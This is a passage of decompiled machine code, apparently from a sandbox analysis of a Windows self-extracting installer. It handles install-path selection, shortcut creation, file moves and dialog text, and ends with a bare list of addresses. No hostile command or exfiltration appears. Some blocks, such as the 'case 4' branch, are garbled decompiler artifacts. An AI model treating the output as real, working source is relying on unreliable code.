                                                                                                                                                  														__eflags = _t269;
                                                                                                                                                  														if(_t269 != 0) {
                                                                                                                                                  															_t270 = E00406E67();
                                                                                                                                                  															__eflags = _t270;
                                                                                                                                                  															if(_t270 != 0) {
                                                                                                                                                  																MoveFileExA(_t309 - 0x834, 0, 4);
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														goto L26;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L13:
                                                                                                                                                  											__eflags = E00406E67() - 4;
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												goto L18;
                                                                                                                                                  											}
                                                                                                                                                  											L14:
                                                                                                                                                  											E004072D9(_t301, __eflags, _t309 - 0x434, _t309 - 0x2034);
                                                                                                                                                  											E004076A1(_t309 - 0x2034);
                                                                                                                                                  											_t280 = E0040A35D(_t301, _t309 - 0x434);
                                                                                                                                                  											 *((intOrPtr*)(_t309 - 0xc)) = _t280;
                                                                                                                                                  											__eflags = _t280 - 4;
                                                                                                                                                  											if(_t280 < 4) {
                                                                                                                                                  												L16:
                                                                                                                                                  												_t282 = E00407252(_t301, _t309 - 0x1c34, 0);
                                                                                                                                                  												__eflags = _t282;
                                                                                                                                                  												if(_t282 != 0) {
                                                                                                                                                  													goto L27;
                                                                                                                                                  												}
                                                                                                                                                  												L17:
                                                                                                                                                  												 *((char*)(_t309 + E0040A35D(_t301, _t309 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                  												E0040A262(_t301, _t309 - 0x34, 0, 0x1e);
                                                                                                                                                  												_push(0x14);
                                                                                                                                                  												_pop(_t287);
                                                                                                                                                  												 *((short*)(_t309 - 0x24)) = _t287;
                                                                                                                                                  												 *((intOrPtr*)(_t309 - 0x2c)) = _t309 - 0x30d4;
                                                                                                                                                  												 *((intOrPtr*)(_t309 - 0x30)) = 3;
                                                                                                                                                  												SHFileOperationA(_t309 - 0x34);
                                                                                                                                                  												goto L18;
                                                                                                                                                  											}
                                                                                                                                                  											L15:
                                                                                                                                                  											_t292 = E0040A35D(_t301, _t309 - 0x2034);
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t309 - 0xc)) - _t292;
                                                                                                                                                  											if( *((intOrPtr*)(_t309 - 0xc)) > _t292) {
                                                                                                                                                  												goto L17;
                                                                                                                                                  											}
                                                                                                                                                  											goto L16;
                                                                                                                                                  											L26:
                                                                                                                                                  											_push(0);
                                                                                                                                                  											_t301 = _t309 - 0x40dc;
                                                                                                                                                  											_t259 = E00405F6F(_t309 - 0x40dc, _t302, _t309 - 0x30d4);
                                                                                                                                                  											__eflags = _t259;
                                                                                                                                                  										} while (_t259 != 0);
                                                                                                                                                  										goto L27;
                                                                                                                                                  									}
                                                                                                                                                  								case 1:
                                                                                                                                                  									L28:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
                                                                                                                                                  									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											__esi = __ebp + 0xc;
                                                                                                                                                  											__edi = E0040B793(__ebp + 0xc, __eflags);
                                                                                                                                                  										} else {
                                                                                                                                                  											__edi = __ebp - 0x1c34;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __bl;
                                                                                                                                                  										if(__bl == 0) {
                                                                                                                                                  											__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                  										} else {
                                                                                                                                                  											__esi = 0;
                                                                                                                                                  										}
                                                                                                                                                  										E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  										__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                  										 *0x41a81c = __eax;
                                                                                                                                                  										__eflags = __bl;
                                                                                                                                                  										if(__bl != 0) {
                                                                                                                                                  											 *__eax = 0;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = E0040A5BB(__eax, __edi);
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  										if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                  											__eax = E0040A1DE(__edi);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 2:
                                                                                                                                                  									L41:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
                                                                                                                                                  									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  										__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 3:
                                                                                                                                                  									L43:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
                                                                                                                                                  									if( *(__ebp + 0x10) != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L44:
                                                                                                                                                  									__eflags =  *0x419f92;
                                                                                                                                                  									if( *0x419f92 != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L45:
                                                                                                                                                  									__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                  									__esi = __ebp - 0x1c34;
                                                                                                                                                  									 *(__ebp - 0x434) = 0;
                                                                                                                                                  									if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                  										__esi = __ebp - 0x1c33;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = E0040A35D(__ecx, __esi);
                                                                                                                                                  									__eflags = __eax - 0x400;
                                                                                                                                                  									if(__eax >= 0x400) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									} else {
                                                                                                                                                  										L48:
                                                                                                                                                  										__al = __esi->i;
                                                                                                                                                  										__eflags = __al - 0x2e;
                                                                                                                                                  										if(__al != 0x2e) {
                                                                                                                                                  											L57:
                                                                                                                                                  											__eflags = __al - 0x5c;
                                                                                                                                                  											if(__al == 0x5c) {
                                                                                                                                                  												L51:
                                                                                                                                                  												__ebp - 0x434 = E0040A450(__ebp - 0x434, __esi);
                                                                                                                                                  												L52:
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__eax = E0040A3B2(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                  													__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  													if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  														 *__eax = 0;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												__ebp - 0x434 = E0040A450(__ebx, __ebp - 0x434);
                                                                                                                                                  												__ebp - 0x434 = E0040B989(__esi, __ebp - 0x434);
                                                                                                                                                  												__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                  												__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                  												__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__eax = E0040A4C2(__ebx, __ebp - 0x434);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                  													__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                  												}
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L58:
                                                                                                                                                  											__eflags = __al;
                                                                                                                                                  											if(__al == 0) {
                                                                                                                                                  												L60:
                                                                                                                                                  												__eax = __ebp - 0x10;
                                                                                                                                                  												__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10); // executed
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                  													__eax = __ebp - 0x14;
                                                                                                                                                  													 *(__ebp - 0xc) = 0x400;
                                                                                                                                                  													__eax = RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc); // executed
                                                                                                                                                  													__eax = RegCloseKey( *(__ebp - 0x10)); // executed
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *(__ebp - 0x434);
                                                                                                                                                  												if( *(__ebp - 0x434) != 0) {
                                                                                                                                                  													__eax = __ebp - 0x434;
                                                                                                                                                  													__eax = E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                  													__ecx = __ebp - 0x434;
                                                                                                                                                  													__ecx = __ebp - 0x433;
                                                                                                                                                  													__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  													if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  														__ebp - 0x434 = E0040A5BB(__ebp - 0x434, "\\");
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												__edi = E0040A35D(__ecx, __esi);
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__edi = __edi + E0040A35D(__ecx, __ebp - 0x434);
                                                                                                                                                  												__eflags = __edi - 0x3ff;
                                                                                                                                                  												if(__edi < 0x3ff) {
                                                                                                                                                  													__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __esi);
                                                                                                                                                  												}
                                                                                                                                                  												goto L52;
                                                                                                                                                  											}
                                                                                                                                                  											L59:
                                                                                                                                                  											__eflags = __esi->i - 0x3a;
                                                                                                                                                  											if(__esi->i == 0x3a) {
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
                                                                                                                                                  											goto L60;
                                                                                                                                                  										}
                                                                                                                                                  										L49:
                                                                                                                                                  										__eflags = __esi->i - 0x5c;
                                                                                                                                                  										if(__esi->i != 0x5c) {
                                                                                                                                                  											goto L57;
                                                                                                                                                  										}
                                                                                                                                                  										L50:
                                                                                                                                                  										__esi =  &(__esi->i);
                                                                                                                                                  										__eflags = __esi->i;
                                                                                                                                                  										if(__esi->i == 0) {
                                                                                                                                                  											goto L152;
                                                                                                                                                  										}
                                                                                                                                                  										goto L51;
                                                                                                                                                  									}
                                                                                                                                                  								case 4:
                                                                                                                                                  									L67:
                                                                                                                                                  									__eflags =  *0x419f8c - 1;
                                                                                                                                                  									__eflags = __eax - 0x419f8c;
                                                                                                                                                  									 *__edi =  *__edi + __ecx;
                                                                                                                                                  									__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                  									 *__eax =  *__eax + __al;
                                                                                                                                                  									__eflags =  *__eax;
                                                                                                                                                  								case 5:
                                                                                                                                                  									L72:
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L79:
                                                                                                                                                  										 *0x419edf = 0;
                                                                                                                                                  										 *0x419ede = 1;
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L73:
                                                                                                                                                  									__eax = __eax - 0x30;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L77:
                                                                                                                                                  										 *0x419edf = 0;
                                                                                                                                                  										L78:
                                                                                                                                                  										 *0x419ede = 0;
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L74:
                                                                                                                                                  									__eax = __eax - 1;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										goto L79;
                                                                                                                                                  									}
                                                                                                                                                  									L75:
                                                                                                                                                  									__eax = __eax - 1;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									} else {
                                                                                                                                                  										 *0x419edf = 1;
                                                                                                                                                  										goto L78;
                                                                                                                                                  									}
                                                                                                                                                  								case 6:
                                                                                                                                                  									L85:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                  									if( *(__ebp + 0x10) != 4) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L86:
                                                                                                                                                  									_push(0);
                                                                                                                                                  									goto L87;
                                                                                                                                                  								case 7:
                                                                                                                                                  									goto L0;
                                                                                                                                                  								case 8:
                                                                                                                                                  									L107:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                  									if( *(__ebp + 0x10) == 3) {
                                                                                                                                                  										__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                  										}
                                                                                                                                                  										__esi = __ebp + 0xc;
                                                                                                                                                  										 *0x41a820 = E0040B793(__esi, __eflags);
                                                                                                                                                  									}
                                                                                                                                                  									 *0x41a817 = 1;
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 9:
                                                                                                                                                  									L112:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                  									if( *(__ebp + 0x10) != 5) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L113:
                                                                                                                                                  									_push(1);
                                                                                                                                                  									L87:
                                                                                                                                                  									__ebp - 0x1c34 = E0040BD59(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 0xa:
                                                                                                                                                  									L114:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 6;
                                                                                                                                                  									if( *(__ebp + 0x10) != 6) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L115:
                                                                                                                                                  									__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                  									__eax = E0040A229(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                  									__eax = __eax - 0x50;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										 *(__ebp - 4) = 2;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax = __eax - 3;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											 *(__ebp - 4) = 0xb;
                                                                                                                                                  										} else {
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												 *(__ebp - 4) = 7;
                                                                                                                                                  											} else {
                                                                                                                                                  												 *(__ebp - 4) = 0x10;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                  									 *(__ebp - 0x2034) = 0;
                                                                                                                                                  									 *(__ebp - 0x834) = 0;
                                                                                                                                                  									__eax = E0040A450(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										L125:
                                                                                                                                                  										__ebp - 0xc34 = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al != 0) {
                                                                                                                                                  											goto L139;
                                                                                                                                                  										}
                                                                                                                                                  										L126:
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										__eflags =  *(__ebp - 0xc34);
                                                                                                                                                  										__esi = __ebp - 0xc34;
                                                                                                                                                  										if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                  											goto L139;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L127;
                                                                                                                                                  										}
                                                                                                                                                  										do {
                                                                                                                                                  											L127:
                                                                                                                                                  											__bl = __esi->i;
                                                                                                                                                  											__eflags = __bl - 0x20;
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												L129:
                                                                                                                                                  												__eax = __ebp - 0xc34;
                                                                                                                                                  												__esi->i = 0;
                                                                                                                                                  												__eax = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  												__eflags = __al;
                                                                                                                                                  												if(__al == 0) {
                                                                                                                                                  													L135:
                                                                                                                                                  													__esi->i = __bl;
                                                                                                                                                  													goto L136;
                                                                                                                                                  												}
                                                                                                                                                  												L130:
                                                                                                                                                  												__edi = __esi;
                                                                                                                                                  												__eflags = __bl - 0x2f;
                                                                                                                                                  												if(__bl != 0x2f) {
                                                                                                                                                  													do {
                                                                                                                                                  														L132:
                                                                                                                                                  														__esi =  &(__esi->i);
                                                                                                                                                  														__eflags = __esi->i - 0x20;
                                                                                                                                                  													} while (__esi->i == 0x20);
                                                                                                                                                  													_push(__esi);
                                                                                                                                                  													__eax = __ebp - 0x834;
                                                                                                                                                  													L134:
                                                                                                                                                  													_push(__eax);
                                                                                                                                                  													__eax = E0040A450();
                                                                                                                                                  													 *__edi = __bl;
                                                                                                                                                  													goto L136;
                                                                                                                                                  												}
                                                                                                                                                  												L131:
                                                                                                                                                  												_t185 =  &(__esi->i); // 0x1
                                                                                                                                                  												__eax = _t185;
                                                                                                                                                  												_push(_t185);
                                                                                                                                                  												 *(__ebp - 0x834) = __bl;
                                                                                                                                                  												__eax = __ebp - 0x833;
                                                                                                                                                  												goto L134;
                                                                                                                                                  											}
                                                                                                                                                  											L128:
                                                                                                                                                  											__eflags = __bl - 0x2f;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												goto L136;
                                                                                                                                                  											}
                                                                                                                                                  											goto L129;
                                                                                                                                                  											L136:
                                                                                                                                                  											__esi =  &(__esi->i);
                                                                                                                                                  											__eflags = __esi->i;
                                                                                                                                                  										} while (__esi->i != 0);
                                                                                                                                                  										__eflags = __edi;
                                                                                                                                                  										if(__edi != 0) {
                                                                                                                                                  											 *__edi = 0;
                                                                                                                                                  										}
                                                                                                                                                  										goto L139;
                                                                                                                                                  									} else {
                                                                                                                                                  										L123:
                                                                                                                                                  										__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                  										E0040A450(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                  										__eax = E00407384(__ebp - 0xc33, 0x22);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *__eax = 0;
                                                                                                                                                  											__ebp - 0x834 = E0040A450(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                  										}
                                                                                                                                                  										L139:
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                  										if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                  											__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                  											__eax = E004057E4(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                  										E004057E4(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                  										__eax = E0040AA9B(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                  										__ebp - 0x434 = E004076A1(__ebp - 0x434);
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                  										if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                  											__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                  											E0040A5BB(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                  											__eax = E004076A1(__ebp - 0x434);
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                  										__eax = E0040A450(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                  										__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                  										__eax = __ebp - 0x74dc;
                                                                                                                                                  										if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                  											__eax = __ebp - 0xa4dc;
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                  										__eax = __ebp - 0x434;
                                                                                                                                                  										__eax = E00407669(__ebp - 0x434);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											L147:
                                                                                                                                                  											__ebp - 0x434 = E0040A5BB(__ebp - 0x434, ".lnk");
                                                                                                                                                  											goto L148;
                                                                                                                                                  										} else {
                                                                                                                                                  											L146:
                                                                                                                                                  											__eax = E0040A573(__eax, ".lnk");
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L148:
                                                                                                                                                  												__ebp - 0x434 = E004058C1(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                  												 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x834;
                                                                                                                                                  												 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                  												__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x2034;
                                                                                                                                                  												 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                  												__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x84dc;
                                                                                                                                                  												 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                  												__ebp - 0x44dc = E0040A996(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                  												__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                  												if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                  													__eax = __ebp - 0x34d4;
                                                                                                                                                  													SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                  												}
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											goto L147;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								case 0xb:
                                                                                                                                                  									L150:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                  									if( *(__ebp + 0x10) == 7) {
                                                                                                                                                  										 *0x419f90 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 0xc:
                                                                                                                                                  									L80:
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eax = E0040A229(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                  									__eflags = __eax - 0x46;
                                                                                                                                                  									if(__eax == 0x46) {
                                                                                                                                                  										 *0x419edd = 1;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eflags = __eax - 0x55;
                                                                                                                                                  										if(__eax == 0x55) {
                                                                                                                                                  											 *0x419edc = 1;
                                                                                                                                                  										} else {
                                                                                                                                                  											 *0x419edd = 0;
                                                                                                                                                  											 *0x419edc = 0;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  							}
                                                                                                                                                  							L2:
                                                                                                                                                  							_t232 = E0040A8FE(_t232,  *(_t309 - 4));
                                                                                                                                                  							 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                  							_t9 = _t309 - 0xc;
                                                                                                                                                  							 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                  							if( *_t9 != 0) {
                                                                                                                                                  								goto L2;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                  								goto L4;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						return _t231;
                                                                                                                                                  					}
                                                                                                                                                  					L92:
                                                                                                                                                  					if( *0x41a816 != 0) {
                                                                                                                                                  						goto L152;
                                                                                                                                                  					}
                                                                                                                                                  					L93:
                                                                                                                                                  					__eax = __ebp - 0x1c34;
                                                                                                                                                  					 *(__ebp - 0x234) = 0;
                                                                                                                                                  					__eax = E0040A386(__ebp - 0x1c34, 0x2c);
                                                                                                                                                  					if(__eax != 0) {
                                                                                                                                                  						L99:
                                                                                                                                                  						if( *(__ebp - 0x234) == 0) {
                                                                                                                                                  							__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                  							E0040A450(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                  							__ebp - 0x234 = E0040A450(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x1c34 = E0040AB7A(__ebp - 0x1c34);
                                                                                                                                                  						__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                  						 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                  						__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                  						if(__eax == 6) {
                                                                                                                                                  							goto L152;
                                                                                                                                                  						} else {
                                                                                                                                                  							L102:
                                                                                                                                                  							0 = 1;
                                                                                                                                                  							 *0x41a815 = 1;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                  							goto L103;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L94:
                                                                                                                                                  					__esi = 0;
                                                                                                                                                  					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  						goto L99;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L95;
                                                                                                                                                  					}
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L95:
                                                                                                                                                  						if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L96:
                                                                                                                                                  						__esi =  &(__esi->i);
                                                                                                                                                  						if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						L97:
                                                                                                                                                  						goto L99;
                                                                                                                                                  					}
                                                                                                                                                  					L98:
                                                                                                                                                  					__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                  					__eax = E0040A450(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                  					 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                  					goto L99;
                                                                                                                                                  					L103:
                                                                                                                                                  					if( *((intOrPtr*)(_t309 + 0x10)) == 7) {
                                                                                                                                                  						if( *0x419f8c == 0) {
                                                                                                                                                  							 *0x419f8c = 2;
                                                                                                                                                  						}
                                                                                                                                                  						 *0x419f88 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					goto L152;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59b
                                                                                                                                                  0x0040c59f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5a5
                                                                                                                                                  0x0040c5b1
                                                                                                                                                  0x0040c5be
                                                                                                                                                  0x0040c5c3
                                                                                                                                                  0x0040c5c7
                                                                                                                                                  0x0040c5c9
                                                                                                                                                  0x0040c5d6
                                                                                                                                                  0x0040c5d6
                                                                                                                                                  0x0040c5dc
                                                                                                                                                  0x0040c5e3
                                                                                                                                                  0x0040c5eb
                                                                                                                                                  0x0040c5ed
                                                                                                                                                  0x0040c5f0
                                                                                                                                                  0x0040c5f7
                                                                                                                                                  0x0040c5fc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d0
                                                                                                                                                  0x0040c5d3
                                                                                                                                                  0x0040c5d3
                                                                                                                                                  0x0040c5fe
                                                                                                                                                  0x0040c60a
                                                                                                                                                  0x0040c617
                                                                                                                                                  0x0040ca0c
                                                                                                                                                  0x0040ca0c
                                                                                                                                                  0x0040ca1b
                                                                                                                                                  0x0040ca2a
                                                                                                                                                  0x0040ca2f
                                                                                                                                                  0x0040ca33
                                                                                                                                                  0x0040ca39
                                                                                                                                                  0x0040bfba
                                                                                                                                                  0x0040bfd1
                                                                                                                                                  0x0040bfd7
                                                                                                                                                  0x0040bfda
                                                                                                                                                  0x0040bfda
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bffa
                                                                                                                                                  0x0040c015
                                                                                                                                                  0x0040c01c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01e
                                                                                                                                                  0x0040c01c
                                                                                                                                                  0x0040c027
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c02d
                                                                                                                                                  0x0040c030
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c037
                                                                                                                                                  0x0040c037
                                                                                                                                                  0x0040c03b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c041
                                                                                                                                                  0x0040c04d
                                                                                                                                                  0x0040c061
                                                                                                                                                  0x0040c06d
                                                                                                                                                  0x0040c080
                                                                                                                                                  0x0040c08b
